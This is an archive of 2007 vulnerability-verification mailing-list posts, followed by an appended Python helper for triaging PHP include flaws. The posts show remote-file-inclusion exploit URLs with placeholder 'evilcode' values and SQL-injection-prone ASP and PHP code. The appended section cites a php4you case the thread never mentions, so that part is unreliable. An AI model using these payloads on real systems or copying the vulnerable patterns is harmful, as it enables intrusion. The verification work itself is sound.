X-Mailer: Evolution 2.8.2.1
Message-Id: <1169931357.8362.3.camel at localhost>

On 27-01-2007, Sat at 12:52 +0000, trzindan at hotmail.com wrote:
> #########################################################################
> # Open Conference Systems <= 2.8.2 Remote File Inclusion
> # Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz
> #
> # Found By : Tr_ZiNDaN
> # Location : TurkeY -- #trzindan at hotmail.fr
> ########################################################################

This bug has nothing to do with Open Conference System. This is a bug in
OpenEMR (http://http://www.oemr.org/)

-- 
Michael "carstein" Melewski | "We have no future because our present
carstein()7thguard.net      | is too volatile. We have only risk
mobile: 512 357 303         | management. The spinning of the given
JID: carstein()gentoo.pl    | moment's scenarios. Pattern recognition.

--- end forwarded message ---

From rkeith at securityfocus.com Mon Jan 29 13:10:37 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Mon, 29 Jan 2007 11:10:37 -0700 (MST)
Subject: [VIM] [Bogus] [trzindan@hotmail.fr: gnopaste <= 0.5.3 (index.php) Remote File Include Vulnerability] (fwd)
Message-ID:

The PoC shown should tell the tale. The parameter isn't even a variable.
This is at least the third issue recently from this reporter that is fake.

-- 
Rob Keith
Symantec

----- Forwarded message from trzindan at hotmail.fr -----

From: trzindan at hotmail.fr
Subject: gnopaste <= 0.5.3 (index.php) Remote File Include Vulnerability
To: bugtraq at securityfocus.com
Date: 29 Jan 2007 16:24:48 -0000
X-Mailer: MIME-tools 5.411 (Entity 5.404)
Message-ID: <20070129162448.22427.qmail at securityfocus.com>

################ t3K t4b4nc4 #################
#
# gnopaste <= 0.5.3 (index.php) Remote File Include Vulnerability
# Script site: http://sourceforge.net/projects/gnopaste
# Find by Tr_ZiNDaN
# Greetings; EL_MuHaMMeD,CyberWolf,Crackers_Child,EntriKa,Xyu,Sehzade, B4ct3ry,M3rhametsiz,Cold Z3ro,e-system,blackwolf,Paradox_
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# T3K T4B4NC4
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: trzindan at hotmail.fr
#
##################################################################

file: index.php
include(GNP_REAL_PATH . 'includes/common.php');

exp:
http://yourdomain.com/gnopaste-0.5.4/index.php?GNP_REAL_PATH=evildode?
##################################################################

----- End forwarded message -----

From sn0opy.team at gmail.com Mon Jan 29 18:19:37 2007
From: sn0opy.team at gmail.com (sn0oPy da master)
Date: Mon, 29 Jan 2007 23:19:37 +0000
Subject: [VIM] a-forum xss - who? what? where?
Message-ID: <843b3bf90701291519s43275c7ege8bc91317ce336e5@mail.gmail.com>

The a-forum script was developed by Arnaud Guyonne, who is a developer from the former phplive. Because phplive.com no longer exists, I've replaced it with the web site of the creator:

http://www.mistersp.com

That's all.

Fraternally,
sn0oPy from Morocco

From coley at mitre.org Tue Jan 30 10:53:31 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 30 Jan 2007 10:53:31 -0500 (EST)
Subject: [VIM] Source VERIFY: nsGalPHP RFI
Message-ID: <200701301553.l0UFrVWc007286@faron.mitre.org>

Researcher: S.W.A.T.
Ref: http://milw0rm.com/exploits/3205

The code extract is as appears. includes/config.inc.php has:

include_once($racineTBS.'includes/tbs_class.php');

with no prior includes or definitions of $racineTBS.

Of note is that the researcher was not fooled by the main files, such as connexion.php and index.php, which have:

$racineTBS = '';
require_once($racineTBS.'includes/config.inc.php');

and thus don't have RFI.

This is a good demonstration of a realization that I recently had - PHP application developers don't expect that their library files will be directly called, and this is probably the main source of RFIs.

- Steve

From heinbockel at mitre.org Wed Jan 31 14:29:39 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Wed, 31 Jan 2007 14:29:39 -0500
Subject: [VIM] VERIFY of RFI and XSS in OpenEMR 2.8.2 (was [still bogus] V [mike@carstein.kill-9.pl: Re: Open Conference Systems = 2.8.2 Remote File Inclusion])
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC018CEE7D@IMCSRV5.MITRE.ORG>

No, this is not the case. The report is perfectly valid, as shown through later Bugtraq discussions.

This post is for VIM accuracy and completeness, as well as to demonstrate the problems with post-disclosure analysis.
Problem 1 (researcher):

The researcher claims that there is an RFI in import_xml.php in Open Conference Systems (ocs). A look at the example RFI shows that the problem is actually within OpenEMR 2.8.2:

http://localhost/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode

Problem 2 (post-disclosure analyst):

Looking at custom/import_xml.php in OpenEMR 2.8.2 (lines 13-15):

> include_once("../interface/globals.php");
> include_once("$srcdir/patient.inc");
> include_once("$srcdir/acl.inc");

Now tracing back into interface/globals.php:

> $GLOBALS['srcdir'] = "$webserver_root/library";   // line 24
> ...
> $srcdir = $GLOBALS['srcdir'];                      // line 119

** So at this point we have an apparent dispute. **

However, continuing further into interface/globals.php (lines 240-245):

> // required for normal operation because of recent changes in PHP:
> $ps = strpos($_SERVER['REQUEST_URI'],"myadmin");
> if ($ps === false) {
>   extract($_GET);
>   extract($_POST);
> }

** WHOOPS. The vendor did do the right thing, until those two little extract statements were slipped in for "normal operation". **

===================================================================

Additionally, in followup Bugtraq discussions, there is an XSS in the rootdir parameter in interface/login/login_frame.php. This is also confirmed and stems from the same variable overwrite issue that caused the above RFI.

http://www.securityfocus.com/archive/1/458465/100/0/threaded
http://www.securityfocus.com/archive/1/458476/100/0/threaded

William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

>-----Original Message-----
>From: vim-bounces at attrition.org [mailto:vim-bounces at attrition.org] On Behalf Of rkeith at securityfocus.com
>Sent: Monday, 29 January 2007 12:28
>To: Vulnerability Information Managers
>Subject: [VIM] [still bogus] V [mike at carstein.kill-9.pl: Re: Open Conference Systems = 2.8.2 Remote File Inclusion] (fwd)
>
>
>This report came up on the weekend and had some conflicting data. The version
>was wrong for the software specified, and the script didn't exist. This new
>report points to the correct software. However, the report is still bogus,
>as a configuration file (globals.php) called at the beginning of the
>script clearly defines the specified vulnerable parameter.
>
>--
>Rob Keith
>Symantec
>
>
>----- Forwarded message from Michał Melewski -----
>
>From: Michał Melewski
>Subject: Re: Open Conference Systems = 2.8.2 Remote File Inclusion
>To: trzindan at hotmail.com
>Cc: bugtraq at securityfocus.com
>Date: Sat, 27 Jan 2007 21:55:56 +0100
>X-Mailer: Evolution 2.8.2.1
>Message-Id: <1169931357.8362.3.camel at localhost>
>
>On Sat, 27-01-2007 at 12:52 +0000, trzindan at hotmail.com wrote:
>> #########################################################################
>> # Open Conference Systems <= 2.8.2 Remote File Inclusion
>> # Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz
>> #
>> # Found By : Tr_ZiNDaN
>> # Location : TurkeY -- #trzindan at hotmail.fr
>> ########################################################################
>This bug has nothing to do with Open Conference System. This is a bug in
>OpenEMR (http://http://www.oemr.org/)
>
>
>--
>Michael "carstein" Melewski | "We have no future because our present
>carstein()7thguard.net      | is too volatile. We have only risk
>mobile: 512 357 303         | management. The spinning of the given
>JID: carstein()gentoo.pl    | moment's scenarios. Pattern recognition.
>
>--- end forwarded message ---
>

From coley at mitre.org Wed Jan 31 14:44:54 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 31 Jan 2007 14:44:54 -0500 (EST)
Subject: [VIM] Partial source code verify - "RBL - ASP" scripts SQL injection
Message-ID: <200701311944.l0VJisUm002180@faron.mitre.org>

Researcher: sn0oPy
Ref: BUGTRAQ RBL - ASP (scripts with db) SQL injection
http://www.securityfocus.com/archive/1/archive/1/458560/100/0/threaded

The referenced vendor site was casually examined to try to infer actual product names. tUrl was examined, but egrep "user|pass" yielded nothing.

tForum's user_confirm.asp has:

>uId = Request("id")
>
>sql = "select A.* from x_User A Where A.idUser =" & uId & " AND A.sPassword = '" & Request("_pass") & "'"

tpassword's login.asp has:

> iStatus = Check_Login(Request.Form("User"),Request.Form("Password"))
>
>...
>Function Check_Login(sUser, sPass)
>  Dim rs, sql
>
>  sql = "SELECT * FROM tUser WHERE sCode ='" & sUser & "' AND sPassword='" & sPass & "' "

So it looks like at least these two are legit. I didn't look at the other products.

- Steve

From coley at linus.mitre.org Wed Jan 31 15:03:39 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 31 Jan 2007 15:03:39 -0500 (EST)
Subject: [VIM] VERIFY of RFI and XSS in OpenEMR 2.8.2 (was [still bogus] V [mike@carstein.kill-9.pl: Re: Open Conference Systems = 2.8.2 Remote File Inclusion])
In-Reply-To: <224FBC6B814DBD4E9B9E293BE33A10DC018CEE7D@IMCSRV5.MITRE.ORG>
References: <224FBC6B814DBD4E9B9E293BE33A10DC018CEE7D@IMCSRV5.MITRE.ORG>

On Wed, 31 Jan 2007, Heinbockel, Bill wrote:

> > if ($ps === false) {
> >   extract($_GET);
> >   extract($_POST);
> > }
>
> ** WHOOPS. The vendor did do the right thing, until those two little
> extract statements were slipped in for "normal operation".**

Great find, Bill. Reminds me of why I love to hate PHP.

- Steve
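The source-verification steps in this thread (Steve's nsGalPHP note that a library file includes via a variable it never defines, and Bill's OpenEMR trace in which a properly defined variable is made overwritable again by extract($_GET)) reduce to a few checks an analyst repeats by hand. The Python triage helper below is an added example, not code from the VIM list or from any of the projects discussed; the PHP snippets it runs on are constructed from the fragments quoted in the thread and are not the real files.

```python
import re

# One include/require statement and its argument expression (up to the ';').
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\b\s*\(?([^;]*?)\)?\s*;')
# Plain PHP variables in the path; $GLOBALS and superglobals are not clobbered by extract().
VAR_RE = re.compile(r'\$(?!GLOBALS\b|_(?:GET|POST|REQUEST|SERVER)\b)([A-Za-z_]\w*)')
# A blanket extract() of request data without EXTR_SKIP overwrites already-defined variables.
EXTRACT_RE = re.compile(r'extract\s*\(\s*\$_(?:GET|POST|REQUEST)\s*(?:,\s*EXTR_OVERWRITE\s*)?\)')


def assigned_before(var, source, pos):
    """True if a plain assignment '$var = ...' (not '==') appears before offset pos."""
    return re.search(r'\$' + re.escape(var) + r'\b\s*=(?!=)', source[:pos]) is not None


def triage(source):
    """Return (statement, variable, verdict) for each include/require in the PHP text.

    Pass the file under review appended to the files it includes first, in the
    order an analyst traces them (e.g. globals.php before import_xml.php).
    """
    clobbered = EXTRACT_RE.search(source) is not None
    findings = []
    for m in INCLUDE_RE.finditer(source):
        stmt, arg = m.group(0).strip(), m.group(1)
        names = VAR_RE.findall(arg)
        if not names:                          # gnopaste case: a constant, not a variable
            findings.append((stmt, None, 'constant path'))
        for var in names:
            if not assigned_before(var, source, m.start()):
                verdict = 'undefined: RFI candidate'        # library file called directly
            elif clobbered:
                verdict = 'defined but overwritable via extract()'
            else:
                verdict = 'defined before use'
            findings.append((stmt, var, verdict))
    return findings


# Constructed samples modeled on the fragments quoted in the thread (not the real files).
PHP4YOU = '''$dir = "bot_functions/";
$dirh = opendir($dir);
while ($file = readdir($dirh)) {
  if (substr($file, -4) == ".php") { include_once($dir . $file); }
}
'''
NSGAL_CONFIG = "include_once($racineTBS.'includes/tbs_class.php');\n"
GNOPASTE = "include(GNP_REAL_PATH . 'includes/common.php');\n"
OPENEMR = '''$GLOBALS['srcdir'] = "$webserver_root/library";
$srcdir = $GLOBALS['srcdir'];
if ($ps === false) { extract($_GET); extract($_POST); }
include_once("$srcdir/patient.inc");
'''
```

Running `triage()` over the four samples reproduces the thread's four verdicts: php4you defined, nsGalPHP undefined, gnopaste a constant, and OpenEMR defined but clobbered; swapping `extract($_GET)` for `extract($_GET, EXTR_SKIP)` turns the OpenEMR verdict back into "defined before use".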